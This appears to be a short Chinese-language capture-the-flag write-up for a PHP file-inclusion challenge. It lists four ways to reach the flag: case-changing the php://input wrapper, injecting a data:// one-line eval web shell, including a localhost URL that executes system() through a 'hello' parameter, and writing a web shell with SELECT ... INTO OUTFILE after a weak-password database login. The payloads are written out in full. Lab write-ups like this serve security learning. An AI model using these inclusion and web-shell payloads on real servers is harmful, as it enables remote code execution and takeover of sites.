如图,过滤了php常用的伪协议
1.大小写绕过
Php://input
抓包,并在数据包中写入<?php system(\'ls\'); ?>查看目录下文件
发现存在fl4gisisish3r3.php的文件,使用system(\'cat fl4gisisish3r3.php\')读取
2.用data伪协议写入一句话木马
payload:?page=data://text/plain,<?php @eval($_POST[\'pass\']);?>
蚁剑连接没问题,奇怪的姿势增加了
当然也可以用data伪协议,使用第一种方法慢慢找flag
3.用hello输出flag
1.审计php代码,while函数根据page参数来判断php文件是否存在,如果存在此文件,则进行文件包含。
2.默认页面为,设置为page值,可确保while为真
3.利用hello参数将执行内容显示
paylaod:?page=http://127.0.0.1/index.php/?hello=<?system(\'ls\');?>
?page=http://127.0.0.1/index.php/?hello=<?show_source(\'fl4gisisish3r3.php\');?>
4.数据库写入
扫描后台
弱口令(甚至没有密码)
payload:select "<?php eval(@$_POST[\'ctf\']); ?>"into outfile \'/tmp/test.php\'
需要自己去寻找路径
之后蚁剑连接,也得到了flag,
奇怪的姿势又增加了